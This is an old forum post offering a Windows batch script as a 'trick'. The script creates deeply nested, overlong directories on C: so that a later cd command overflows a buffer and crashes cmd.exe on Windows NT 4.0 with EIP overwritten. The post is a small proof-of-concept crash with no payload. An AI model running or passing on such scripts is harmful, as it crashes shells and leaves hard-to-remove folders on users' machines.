[Trick]Buffer overflow in CMD

Admin Sun Aug 10, 2008 7:26 pm

Open Notepad,copy the following code and save it in the .bat file format.

Code:: @echo off SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBB mkdir \\?\c:\%A% mkdir \\?\c:\%A%\%A% mkdir \\?\c:\%A%\%B%\ c: cd \ cd AAAAAAAAAAAA* cd AAAAAAAAAAAA* cd BBBBBBBBBBBB* cd ..

Creates directory with 2 subdirectory. First one demonstrates buffer overflow on Windows NT 4.0 (second cd AAAAAAAAA* command will crash cmd.exe with EIP overwritten) second one demonstrates cmd.exe to change directory to AA...\BB..., but cd .. command will fail.